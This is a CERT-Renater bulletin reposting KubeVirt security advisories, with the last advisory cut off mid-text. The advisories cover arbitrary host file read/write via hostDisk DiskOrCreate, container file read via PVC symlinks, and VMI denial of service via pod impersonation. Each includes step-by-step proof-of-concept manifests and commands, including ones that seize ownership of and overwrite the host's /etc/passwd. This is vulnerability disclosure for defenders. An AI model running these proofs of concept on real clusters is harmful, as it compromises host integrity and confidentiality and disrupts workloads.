Ce mail provient de l'extérieur, restons vigilants

=====================================================================

                            CERT-Renater

                Note d'Information No. 2025/VULN796
_____________________________________________________________________

DATE                : 14/11/2025

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running kubevirt.

=====================================================================
https://github.com/kubevirt/kubevirt/security/advisories/GHSA-46xp-26xh-hpqh
https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qw6q-3pgr-5cwq
https://github.com/kubevirt/kubevirt/security/advisories/GHSA-9m94-w2vq-hcf9
https://github.com/kubevirt/kubevirt/security/advisories/GHSA-2r4r-5x78-mvqf
https://github.com/kubevirt/kubevirt/security/advisories/GHSA-38jw-g2qx-4286
https://github.com/kubevirt/kubevirt/security/advisories/GHSA-7xgm-5prm-v5gc
https://github.com/kubevirt/kubevirt/security/advisories/GHSA-ggp9-c99x-54gp
_____________________________________________________________________


Arbitrary Host File Read and Write
High
stu-gott published GHSA-46xp-26xh-hpqh Nov 6, 2025

Package
No package listed

Affected versions
1.5.0

Patched versions
None


Description

Summary

The hostDisk feature in KubeVirt allows mounting a host file or
directory owned by the user with UID 107 into a VM. However, the
implementation of this feature and more specifically the DiskOrCreate
option which creates a file if it doesn't exist, has a logic bug that
allows an attacker to read and write arbitrary files owned by more
privileged users on the host system.


Details

The hostDisk feature gate in KubeVirt allows mounting a QEMU RAW image
directly from the host into a VM. While similar features, such as
mounting disk images from a PVC, enforce ownership-based restrictions
(e.g., only allowing files owned by specific UID, this mechanism can
be subverted. For a RAW disk image to be readable by the QEMU process
running within the virt-launcher pod, it must be owned by a user with
UID 107. If this ownership check is considered a security barrier, it
can be bypassed. In addition, the ownership of the host files mounted
via this feature is changed to the user with UID 107.

The above is due to a logic bug in the code of the virt-handler
component which prepares and sets the permissions of the volumes and
data inside which are going to be mounted in the virt-launcher pod
and consecutively consumed by the VM. It is triggered when one tries
to mount a host file or directory using the DiskOrCreate option. The
relevant code is as follows:

// pkg/host-disk/host-disk.go

func (hdc DiskImgCreator) Create(vmi *v1.VirtualMachineInstance) error {
	for _, volume := range vmi.Spec.Volumes {
		if hostDisk := volume.VolumeSource.HostDisk; shouldMountHostDisk(hostDisk) {
			if err := hdc.mountHostDiskAndSetOwnership(vmi, volume.Name, hostDisk); err != nil {
				return err
			}
		}
	}
	return nil
}

func shouldMountHostDisk(hostDisk *v1.HostDisk) bool {
	return hostDisk != nil && hostDisk.Type == v1.HostDiskExistsOrCreate && hostDisk.Path != ""
}

func (hdc *DiskImgCreator) mountHostDiskAndSetOwnership(vmi *v1.VirtualMachineInstance, volumeName string, hostDisk *v1.HostDisk) error {
	diskPath := GetMountedHostDiskPathFromHandler(unsafepath.UnsafeAbsolute(hdc.mountRoot.Raw()), volumeName, hostDisk.Path)
	diskDir := GetMountedHostDiskDirFromHandler(unsafepath.UnsafeAbsolute(hdc.mountRoot.Raw()), volumeName)
	fileExists, err := ephemeraldiskutils.FileExists(diskPath)
	if err != nil {
		return err
	}
	if !fileExists {
		if err := hdc.handleRequestedSizeAndCreateSparseRaw(vmi, diskDir, diskPath, hostDisk); err != nil {
			return err
		}
	}
	// Change file ownership to the qemu user.
	if err := ephemeraldiskutils.DefaultOwnershipManager.UnsafeSetFileOwnership(diskPath); err != nil {
		log.Log.Reason(err).Errorf("Couldn't set Ownership on %s: %v", diskPath, err)
		return err
	}
	return nil
}

The root cause lies in the fact that if the specified by the user
file does not exist, it is created by the
handleRequestedSizeAndCreateSparseRaw function. However, this
function does not explicitly set file ownership or permissions. As
a result, the logic in mountHostDiskAndSetOwnership proceeds to the
branch marked with // Change file ownership to the qemu user,
assuming ownership should be applied. This logic fails to account for
the scenario where the file already exists and may be owned by a more
privileged user.
In such cases, changing file ownership without validating the file's
origin introduces a security risk: it can unintentionally grant
access to sensitive host files, compromising their integrity and
confidentiality. This may also enable an External API Attacker to
disrupt system availability.


PoC

To demonstrate this vulnerability, the hostDisk feature gate should
be enabled when deploying the KubeVirt stack.

# kubevirt-cr.yaml
apiVersion: kubevirt.io/v1
kind: KubeVirt
metadata:
  name: kubevirt
  namespace: kubevirt
spec:
  certificateRotateStrategy: {}
  configuration:
    developerConfiguration:
      featureGates:
        -  HostDisk
  customizeComponents: {}
  imagePullPolicy: IfNotPresent
  workloadUpdateStrategy: {}

Initially, if one tries to create a VM and mount /etc/passwd from the
host using the Disk option which assumes that the file already
exists, the following error is returned:

# arbitrary-host-read-write.yaml
apiVersion: kubevirt.io/v1
kind: VirtualMachine
metadata:
  name: arbitrary-host-read-write
spec:
  runStrategy: Always
  template:
    metadata:
      labels:
        kubevirt.io/size: small
        kubevirt.io/domain: arbitrary-host-read-write
    spec:
      domain:
        devices:
          disks:
            - name: containerdisk
              disk:
                bus: virtio
            - name: cloudinitdisk
              disk:
                bus: virtio
            - name: host-disk
              disk:
                bus: virtio
          interfaces:
          - name: default
            masquerade: {}
        resources:
          requests:
            memory: 64M
      networks:
      - name: default
        pod: {}
      volumes:
        - name: containerdisk
          containerDisk:
            image: quay.io/kubevirt/cirros-container-disk-demo
        - name: cloudinitdisk
          cloudInitNoCloud:
            userDataBase64: SGkuXG4=
        - name: host-disk
          hostDisk:
            path: /etc/passwd
            type: Disk

# Deploy the above VM manifest
operator@minikube:~$ kubectl apply -f arbitrary-host-read-write.yaml
# Observe the deployment status
operator@minikube:~$ kubectl get vm
NAME                        AGE     STATUS             READY
arbitrary-host-read-write   7m55s   CrashLoopBackOff   False
# Inspect the reason for the `CrashLoopBackOff`
operator@minikube:~$ kubectl get vm arbitrary-host-read-write  -o jsonpath='{.status.conditions[3].message}'
server error. command SyncVMI failed: "LibvirtError(Code=1, Domain=10, Message='internal error: process exited while connecting to monitor: 2025-05-20T20:14:01.546609Z qemu-kvm: -blockdev {\"driver\":\"file\",\"filename\":\"/var/run/kubevirt-private/vmi-disks/host-disk/passwd\",\"aio\":\"native\",\"node-name\":\"libvirt-1-storage\",\"read-only\":false,\"discard\":\"unmap\",\"cache\":{\"direct\":true,\"no-flush\":false}}: Could not open '/var/run/kubevirt-private/vmi-disks/host-disk/passwd': Permission denied')"

The hosts's /etc/passwd file's owner and group are 0:0 (root:root) hence, when one tries to deploy the above VirtualMachine definition, it gets a PermissionDenied error because the file is not owned by the user with UID 107 (qemu):

# Inspect the ownership of the host's mounted `/etc/passwd` file
within the `virt-launcher` pod responsible for the VM
operator@minikube:~$ kubectl exec -it virt-launcher-arbitrary-host-read-write-tjjkt -- ls -al /var/run/kubevirt-private/vmi-disks/host-disk/passwd
-rw-r--r--. 1 root root 1276 Jan 13 17:10 /var/run/kubevirt-private/vmi-disks/host-disk/passwd

However, if one uses the DiskOrCreate option, the file's ownership is
silently changed to 107:107 (qemu:qemu) before the VM is started
which allows the latter to boot, and then read and modify it.

...
hostDisk:
            capacity: 1Gi
            path: /etc/passwd
            type: DiskOrCreate

# Apply the modified manifest
operator@minikube:~$ kubectl apply -f arbitrary-host-read-write.yaml
# Observe the deployment status
operator@minikube::~$ kubectl get vm
NAME                        AGE     STATUS             READY
arbitrary-host-read-write   7m55s   Running   False
# Initiate a console connection to the running VM
operator@minikube: virtctl console arbitrary-host-read-write
...

# Within the VM arbitrary-host-read-write, inspect the present block
devices and their contents

root@arbitrary-host-read-write:~$ lsblk
NAME    MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
vda     253:0    0   44M  0 disk
|-vda1  253:1    0   35M  0 part /
`-vda15 253:15   0    8M  0 part
vdb     253:16   0    1M  0 disk
vdc     253:32   0  1.5K  0 disk
root@arbitrary-host-read-write:~$ cat /dev/vdc
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
_rpc:x:101:65534::/run/rpcbind:/usr/sbin/nologin
systemd-network:x:102:106:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:107:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
statd:x:104:65534::/var/lib/nfs:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
docker:x:1000:999:,,,:/home/docker:/bin/bash
# Write into the block device backed up by the host's `/etc/passwd` file
root@arbitrary-host-read-write:~$ echo "Quarkslab" | tee -a /dev/vdc

If one inspects the file content of the host's /etc/passwd file, they
will see that it has changed alongside its ownership:

# Inspect the contents of the file
operator@minikube:~$ cat /etc/passwd
Quarkslab
:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
_rpc:x:101:65534::/run/rpcbind:/usr/sbin/nologin
systemd-network:x:102:106:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:107:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
statd:x:104:65534::/var/lib/nfs:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
docker:x:1000:999:,,,:/home/docker:/bin/bash
# Inspect the permissions of the file
operator@minikube:~$ ls -al /etc/passwd
-rw-r--r--. 1 107 systemd-resolve 1276 May 20 20:35 /etc/passwd
# Test the integrity of the system
operator@minikube: $sudo su
sudo: unknown user root
sudo: error initializing audit plugin sudoers_audit


Impact

Host files arbitrary read and write - this vulnerability it can
unintentionally grant access to sensitive host files, compromising
their integrity and confidentiality.


Severity
High

CVE ID
CVE-2025-64324

Weaknesses
Weakness CWE-123
Weakness CWE-200
Weakness CWE-732


Credits

    @mihailkirov mihailkirov Finder
    @Faeris95 Faeris95 Finder
    @jean-edouard jean-edouard Remediation developer

_____________________________________________________________________

Arbitrary Container File Read
Moderate
stu-gott published GHSA-qw6q-3pgr-5cwq Nov 6, 2025

Package
No package listed

Affected versions
1.5.0

Patched versions
None


Description

Summary

_Short summary of the problem. Make the impact and severity as
clear as possible.

Mounting a user-controlled PVC disk within a VM allows an attacker
to read any file present in the virt-launcher pod. This is due to
erroneous handling of symlinks defined within a PVC.


Details

Give all details on the vulnerability. Pointing to the incriminated
source code is very helpful for the maintainer.

A vulnerability was discovered that allows a VM to read arbitrary
files from the virt-launcher pod's file system. This issue stems
from improper symlink handling when mounting PVC disks into a VM.
Specifically, if a malicious user has full or partial control over
the contents of a PVC, they can create a symbolic link that points
to a file within the virt-launcher pod's file system. Since libvirt
can treat regular files as block devices, any file on the pod's
file system that is symlinked in this way can be mounted into the
VM and subsequently read.

Although a security mechanism exists where VMs are executed as an
unprivileged user with UID 107 inside the virt-launcher container,
limiting the scope of accessible resources, this restriction is
bypassed due to a second vulnerability (TODO: put link here). The
latter causes the ownership of any file intended for mounting to
be changed to the unprivileged user with UID 107 prior to
mounting. As a result, an attacker can gain access to and read
arbitrary files located within the virt-launcher pod's file
system or on a mounted PVC from within the guest VM.


PoC

Complete instructions, including specific configuration details,
to reproduce the vulnerability.

Consider that an attacker has control over the contents of two
PVC (e.g., from within a container) and creates the following
symlinks:

# The YAML definition of two PVCs that the attacker has access
to
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: pvc-arbitrary-container-read-1
spec:
  accessModes:
    - ReadWriteMany # suitable for migration (:= RWX)
  resources:
    requests:
      storage: 500Mi
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: pvc-arbitrary-container-read-2
spec:
  accessModes:
    - ReadWriteMany # suitable for migration (:= RWX)
  resources:
    requests:
      storage: 500Mi
---
# The attacker-controlled container used to create the symlinks in the above PVCs
apiVersion: v1
kind: Pod
metadata:
  name: dual-pvc-pod
spec:
  containers:
  - name: app-container
    image: alpine
    command: ["/some-vulnerable-app"]
    volumeMounts:
    - name: pvc-volume-one
      mountPath: /mnt/data1
    - name: pvc-volume-two
      mountPath: /mnt/data2
  volumes:
  - name: pvc-volume-one
    persistentVolumeClaim:
      claimName: pvc-arbitrary-container-read-1
  - name: pvc-volume-two
    persistentVolumeClaim:
      claimName: pvc-arbitrary-container-read-2

By default, Minikube's storage controller (hostpath-provisioner) will
allocate the claim as a directory on the host node (HostPath). Once
the above Kubernetes resources are created, the user can create the
symlinks within the PVC as follows:

# Using the `pvc-arbitrary-container-read-1` PVC we want to read the
default XML configuration generated by `virt-launcher` for `libvirt`.
Hence, the attacker has to create a symlink including the name of
the future VM which will be created using this configuration.

attacker@dual-pvc-pod:/mnt/data1 $ln -s ../../../../../../../../var/run/libvirt/qemu/run/default_arbitrary-container-read.xml disk.img
attacker@dual-pvc-pod:/mnt/data1 $ls -l
lrwxrwxrwx    1 root     root            85 May 19 22:24 disk.img -> ../../../../../../../../var/run/libvirt/qemu/run/default_arbitrary-container-read.xml

# With the `pvc-arbitrary-container-read-2` we want to read the `/etc/passwd` of the `virt-launcher` container which will launch the future VM
attacker@dual-pvc-pod:/mnt/data2 $ln -s ../../../../../../../../etc/passwd disk.img 
attacker@dual-pvc-pod:/mnt/data2 $ls -l
lrwxrwxrwx    1 root     root            34 May 19 22:26 disk.img -> ../../../../../../../../etc/passwd

Of course, these links could potentially be broken as the files,
especially default_arbitrary-container-read.xml, could not exist
on the dual-pvc-pod pod's file system. The attacker then deploy
the following VM:

# arbitrary-container-read.yaml
apiVersion: kubevirt.io/v1
kind: VirtualMachine
metadata:
  name: arbitrary-container-read
spec:
  runStrategy: Always
  template:
    metadata:
      labels:
        kubevirt.io/size: small
        kubevirt.io/domain: arbitrary-container-read
    spec:
      domain:
        devices:
          disks:
            - name: containerdisk
              disk:
                bus: virtio
            - name: pvc-1
              disk:
                bus: virtio
            - name: pvc-2
              disk:
                bus: virtio
            - name: cloudinitdisk
              disk:
                bus: virtio
          interfaces:
          - name: default
            masquerade: {}
        resources:
          requests:
            memory: 64M
      networks:
      - name: default
        pod: {}
      volumes:
        - name: containerdisk
          containerDisk:
            image: quay.io/kubevirt/cirros-container-disk-demo
        - name: pvc-1
          persistentVolumeClaim:
           claimName: pvc-arbitrary-container-read-1
        - name: pvc-2
          persistentVolumeClaim:
           claimName: pvc-arbitrary-container-read-2
        - name: cloudinitdisk
          cloudInitNoCloud:
            userDataBase64: SGkuXG4=

The two PVCs will be mounted as volumes in "filesystem" mode:

From the documentation of the different volume modes, one can
infer that if the backing disk.img is not owned by the
unprivileged user with UID 107, the VM should fail to mount it. In
addition, it's expected that this backing file is in RAW format.
While this format can contain pretty much anything, we consider
that being able to mount a file from the file system of
virt-launcher is not the expected behaviour. Below is demonstrated
that after applying the VM manifest, the guest can read the
/etc/passwd and default_migration.xml files from the virt-launcher
pod's file system:

# Deploy the VM manifest
operator@minikube:~$ kubectl apply -f arbitrary-container-read.yaml
virtualmachine.kubevirt.io/arbitrary-container-read created
# Observe the deployment status
operator@minikube:~$ kubectl get vmis
NAME                       AGE   PHASE     IP           NODENAME       READY
arbitrary-container-read   80s   Running   10.244.1.9   minikube-m02   True
# Initiate a console connection to the running VM
operator@minikube:~$ virtctl console arbitrary-container-read

# Within the `arbitrary-container-read` VM, inspect the available
block devices
root@arbitrary-container-read:~$ lsblk
NAME    MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
vda     253:0    0   44M  0 disk
|-vda1  253:1    0   35M  0 part /
-vda15 253:15   0    8M  0 part
vdb     253:16   0   20K  0 disk
vdc     253:32   0  512B  0 disk
vdd     253:48   0    1M  0 disk
# Inspect the mounted /etc/passwd of the `virt-launcher` pod
root@arbitrary-container-read:~$ cat /dev/vdc
qemu:x:107:107:user:/home/qemu:/bin/bash
root:x:0:0:root:/root:/bin/bash
# Inspect the mounted `default_migration.xml` of the `virt-launcher` pod
root@arbitrary-container-read:~$ cat /dev/vdb | head -n 20
<!--
WARNING: THIS IS AN AUTO-GENERATED FILE. CHANGES TO IT ARE LIKELY TO BE
OVERWRITTEN AND LOST. Changes to this xml configuration should be made
using:
  virsh edit default_arbitrary-container-read
or other application using the libvirt API.
-->
<domstatus state='paused' reason='starting up' pid='80'>
  <monitor path='/var/run/kubevirt-private/libvirt/qemu/lib/domain-1-default_arbitrary-co/monitor.sock' type='unix'/>
  <vcpus>
  </vcpus>
  <qemuCaps>
    <flag name='hda-duplex'/>
    <flag name='piix3-usb-uhci'/>
    <flag name='piix4-usb-uhci'/>
    <flag name='usb-ehci'/>
    <flag name='ich9-usb-ehci1'/>
    <flag name='usb-redir'/>
    <flag name='usb-hub'/>
    <flag name='ich9-ahci'/>

operator@minikube:~$ kubectl get pods
NAME                                           READY   STATUS    RESTARTS   AGE
dual-pvc-pod                                   1/1     Running   0          20m
virt-launcher-arbitrary-container-read-tn4mb   3/3     Running   0          15m
# Inspect the contents of the `/etc/passwd` file of the `virt-launcher` pod attached to the VM
operator@minikube:~$ kubectl exec -it virt-launcher-arbitrary-container-read-tn4mb -- cat /etc/passwd
qemu:x:107:107:user:/home/qemu:/bin/bash
root:x:0:0:root:/root:/bin/bash 

# Inspect the ownership of the `/etc/passwd` file of the ` virt-launcher` pod 
operator@minikube:~$ kubectl exec -it virt-launcher-arbitrary-container-read-tn4mb -- ls -al /etc/passwd
-rw-r--r--. 1 qemu qemu 73 Jan  1  1970 /etc/passwd


Impact

What kind of vulnerability is it? Who is impacted?

This vulnerability breaches the container-to-VM isolation boundary,
compromising the confidentiality of storage data.

Severity
Moderate
6.5/ 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CVE ID
CVE-2025-64433

Weaknesses
Weakness CWE-22
Weakness CWE-200


Credits

    @mihailkirov mihailkirov Finder
    @Faeris95 Faeris95 Finder

_____________________________________________________________________

VMI Denial-of-Service (DoS) Using Pod Impersonation
Moderate
stu-gott published GHSA-9m94-w2vq-hcf9 Nov 6, 2025

Package
No package listed

Affected versions
1.5.0

Patched versions
None


Description

Summary

_Short summary of the problem. Make the impact and severity as clear
as possible.

A logic flaw in the virt-controller allows an attacker to disrupt the
control over a running VMI by creating a pod with the same labels
as the legitimate virt-launcher pod associated with the VMI. This
can mislead the virt-controller into associating the fake pod with
the VMI, resulting in incorrect status updates and potentially
causing a DoS (Denial-of-Service).


Details

Give all details on the vulnerability. Pointing to the incriminated
source code is very helpful for the maintainer.

A vulnerability has been identified in the logic responsible for
reconciling the state of VMI. Specifically, it is possible to
associate a malicious attacker-controlled pod with an existing VMI
running within the same namespace as the pod, thereby replacing
the legitimate virt-launcher pod associated with the VMI.

The virt-launcher pod is critical for enforcing the isolation
mechanisms applied to the QEMU process that runs the virtual
machine. It also serves, along with virt-handler, as a management
interface that allows cluster users, operators, or administrators
to control the lifecycle of the VMI (e.g., starting, stopping,
or migrating it).

When virt-controller receives a notification about a change in a
VMI's state, it attempts to identify the corresponding
virt-launcher pod. This is necessary in several scenarios,
including:

    When hardware devices are requested to be hotplugged into the
VMI—they must also be hotplugged into the associated
virt-launcher pod.
    When additional RAM is requested—this may require updating
the virt-launcher pod's cgroups.
    When additional CPU resources are added—this may also
necessitate modifying the virt-launcher pod's cgroups.
    When the VMI is scheduled to migrate to another node.

The core issue lies in the implementation of the GetControllerOf
function, which is responsible for determining the controller
(i.e., owning resource) of a given pod. In its current form, this
logic can be manipulated, allowing an attacker to substitute a
rogue pod in place of the legitimate virt-launcher, thereby
compromising the VMI's integrity and control mechanisms.

//pkg/controller/controller.go

func CurrentVMIPod(vmi *v1.VirtualMachineInstance, podIndexer cache.Indexer) (*k8sv1.Pod, error) {
	// Get all pods from the VMI namespace which contain the label "kubevirt.io"
	objs, err := podIndexer.ByIndex(cache.NamespaceIndex, vmi.Namespace)
	if err != nil {
		return nil, err
	}
	pods := []*k8sv1.Pod{}
	for _, obj := range objs {
		pod := obj.(*k8sv1.Pod)
		pods = append(pods, pod)
	}

	var curPod *k8sv1.Pod = nil
	for _, pod := range pods {
		if !IsControlledBy(pod, vmi) {
			continue
		}

		if vmi.Status.NodeName != "" &&
			vmi.Status.NodeName != pod.Spec.NodeName {
			// This pod isn't scheduled to the current node.
			// This can occur during the initial migration phases when
			// a new target node is being prepared for the VMI.
			continue
		}
		// take the most recently created pod
		if curPod == nil || curPod.CreationTimestamp.Before(&pod.CreationTimestamp) {
			curPod = pod
		}
	}
	return curPod, nil
}

// pkg/controller/controller_ref.go


// GetControllerOf returns the controllerRef if controllee has a controller,
// otherwise returns nil.
func GetControllerOf(pod *k8sv1.Pod) *metav1.OwnerReference {
	controllerRef := metav1.GetControllerOf(pod)
	if controllerRef != nil {
		return controllerRef
	}
	// We may find pods that are only using CreatedByLabel and not set with an OwnerReference
	if createdBy := pod.Labels[virtv1.CreatedByLabel]; len(createdBy) > 0 {
		name := pod.Annotations[virtv1.DomainAnnotation]
		uid := types.UID(createdBy)
		vmi := virtv1.NewVMI(name, uid)
		return metav1.NewControllerRef(vmi, virtv1.VirtualMachineInstanceGroupVersionKind)
	}
	return nil
}

func IsControlledBy(pod *k8sv1.Pod, vmi *virtv1.VirtualMachineInstance) bool {
	if controllerRef := GetControllerOf(pod); controllerRef != nil {
		return controllerRef.UID == vmi.UID
	}
	return false
}

The current logic assumes that a virt-launcher pod associated with a
VMI may not always have a controllerRef. In such cases, the
controller falls back to inspecting the pod's labels. Specifically
it evaluates the kubevirt.io/created-by label, which is expected to
match the UID of the VMI triggering the reconciliation loop. If
multiple pods are found that could be associated with the same VMI,
the virt-controller selects the most recently created one.

This logic appears to be designed with migration scenarios in mind,
where it is expected that two virt-launcher pods might temporarily
coexist for the same VMI: one for the migration source and one for
the migration target node. However, a scenario was not identified
in which a legitimate virt-launcher pod lacks a controllerRef and
relies solely on labels (such as kubevirt.io/created-by) to
indicate its association with a VMI.

This fallback behaviour introduces a security risk. If an attacker
is able to obtain the UID of a running VMI and create a pod within
the same namespace, they can assign it labels that mimic those of
a legitimate virt-launcher pod. As a result, the CurrentVMIPod
function could mistakenly return the attacker-controlled pod
instead of the authentic one.

This vulnerability has at least two serious consequences:

    The attacker could disrupt or seize control over the VMI's
lifecycle operations.
    The attacker could potentially influence the VMI's migration
target node, bypassing node-level security constraints such as
nodeSelector or nodeAffinity, which are typically used to enforce
workload placement policies.


PoC

Complete instructions, including specific configuration details,
to reproduce the vulnerability.

Consider the following VMI definition:

apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
  name: launcher-label-confusion
spec:
  domain:
    devices:
      disks:
      - name: containerdisk
        disk:
          bus: virtio
      - name: cloudinitdisk
        disk:
          bus: virtio
    resources:
      requests:
        memory: 1024M
  terminationGracePeriodSeconds: 0
  volumes:
  - name: containerdisk
    containerDisk:
      image: quay.io/kubevirt/cirros-container-disk-demo
  - name: cloudinitdisk      
    cloudInitNoCloud:
      userDataBase64: SGkuXG4=

# Deploy the launcher-label-confusion VMI
operator@minikube:~$ kubectl apply -f launcher-confusion-labels.yaml
# Get the UID of the VMI
operator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath='{.metadata.uid}'
18afb8bf-70c4-498b-aece-35804c9a0d11
# Find the UID of the associated to the VMI `virt-launcher` pods (ActivePods)
operator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath='{.status.activePods}'
{"674bc0b1-e3c7-4c05-b300-9e5744a5f2c8":"minikube"}

The UID of the VMI can also be found as an argument to the
container in the virt-launcher pod:

# Inspect the `virt-launcher` pod associated with the VMI and the
--uid CLI argument with which it was launched operator@minikube:~$ kubectl get pods virt-launcher-launcher-label-confusion-bdkwj -o jsonpath='{.spec.containers[0]}' | jq .
{
  "command": [
    "/usr/bin/virt-launcher-monitor",
    ...
    "--uid",
    "18afb8bf-70c4-498b-aece-35804c9a0d11", 
    "--namespace",
    "default",
    ...

Consider the following attacker-controlled pod which is associated to
the VMI using the UID defined in the kubevirt.io/created-by label:

apiVersion: v1
kind: Pod
metadata:
  name: fake-launcher
  labels:
    kubevirt.io: intruder # this is the label used by the virt-controller to identify pods associated with KubeVirt components
    kubevirt.io/created-by: 18afb8bf-70c4-498b-aece-35804c9a0d11 # this is the UID of the launcher-label-confusion VMI which is going to be taken into account if there is no ownerReference. This is the case for regular pods
    kubevirt.io/domain: migration
spec:
  restartPolicy: Never
  containers:
    - name: alpine
      image: alpine
      command: [ "sleep", "3600" ]

operator@minikube:~$ kubectl apply -f fake-launcher.yaml
# Get the UID of the `fake-launcher` pod
operator@minikube:~$ kubectl get pod fake-launcher -o jsonpath='{.metadata.uid}'
39479b87-3119-43b5-92d4-d461b68cfb13

To effectively attach the fake pod to the VMI, the attacker should
wait for a state update to trigger the reconciliation loop:

# Trigger the VMI reconciliation loop
operator@minikube:~$ kubectl patch vmi launcher-label-confusion -p '{"metadata":{"annotations":{"trigger-annotation":"quarkslab"}}}' --type=merge
virtualmachineinstance.kubevirt.io/launcher-label-confusion patched
# Confirm that fake-launcher pod has been associated with the VMI
operator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath='{.status.activePods}'
{"39479b87-3119-43b5-92d4-d461b68cfb13":"minikube", # `fake-launcher` pod's UID
"674bc0b1-e3c7-4c05-b300-9e5744a5f2c8":"minikube"} # original `virt-launcher` pod UID

To illustrate the impact of this vulnerability, a race condition will
be triggered in the sync function of the VMI controller:

// pkg/virt-controller/watch/vmi.go

func (c *Controller) sync(vmi *virtv1.VirtualMachineInstance, pod *k8sv1.Pod, dataVolumes []*cdiv1.DataVolume) (common.SyncError, *k8sv1.Pod) {
  //...
  if !isTempPod(pod) && controller.IsPodReady(pod) {

		// mark the pod with annotation to be evicted by this controller
		newAnnotations := map[string]string{descheduler.EvictOnlyAnnotation: ""}
		maps.Copy(newAnnotations, c.netAnnotationsGenerator.GenerateFromActivePod(vmi, pod))
    // here a new updated pod is returned
		patchedPod, err := c.syncPodAnnotations(pod, newAnnotations)
		if err != nil {
			return common.NewSyncError(err, controller.FailedPodPatchReason), pod
		}
		pod = patchedPod
    // ...

func (c *Controller) syncPodAnnotations(pod *k8sv1.Pod, newAnnotations map[string]string) (*k8sv1.Pod, error) {
	patchSet := patch.New()
	for key, newValue := range newAnnotations {
		if podAnnotationValue, keyExist := pod.Annotations[key]; !keyExist || podAnnotationValue != newValue {
			patchSet.AddOption(
				patch.WithAdd(fmt.Sprintf("/metadata/annotations/%s", patch.EscapeJSONPointer(key)), newValue),
			)
		}
	}
	if patchSet.IsEmpty() {
		return pod, nil
	}
	
	patchBytes, err := patchSet.GeneratePayload()
	// ...
	patchedPod, err := c.clientset.CoreV1().Pods(pod.Namespace).Patch(context.Background(), pod.Name, types.JSONPatchType, patchBytes, v1.PatchOptions{})
  // ...
	return patchedPod, nil
}

The above code adds additional annotations to the virt-launcher pod
related to node eviction. This happens via an API call to Kubernetes
which upon success returns a new updated pod object. This object
replaces the current one in the execution flow.
There is a tiny window where an attacker could trigger a race
condition which will mark the VMI as failed:

// pkg/virt-controller/watch/vmi.go

func isTempPod(pod *k8sv1.Pod) bool {
  // EphemeralProvisioningObject string = "kubevirt.io/ephemeral-provisioning"
	_, ok := pod.Annotations[virtv1.EphemeralProvisioningObject]
	return ok
}

// pkg/virt-controller/watch/vmi.go

func (c *Controller) updateStatus(vmi *virtv1.VirtualMachineInstance, pod *k8sv1.Pod, dataVolumes []*cdiv1.DataVolume, syncErr common.SyncError) error {
  // ...
  vmiPodExists := controller.PodExists(pod) && !isTempPod(pod)
	tempPodExists := controller.PodExists(pod) && isTempPod(pod)

  //...
  case vmi.IsRunning():
		if !vmiPodExists {
      // MK: this will toggle the VMI phase to Failed
			vmiCopy.Status.Phase = virtv1.Failed
			break
		}
    //...

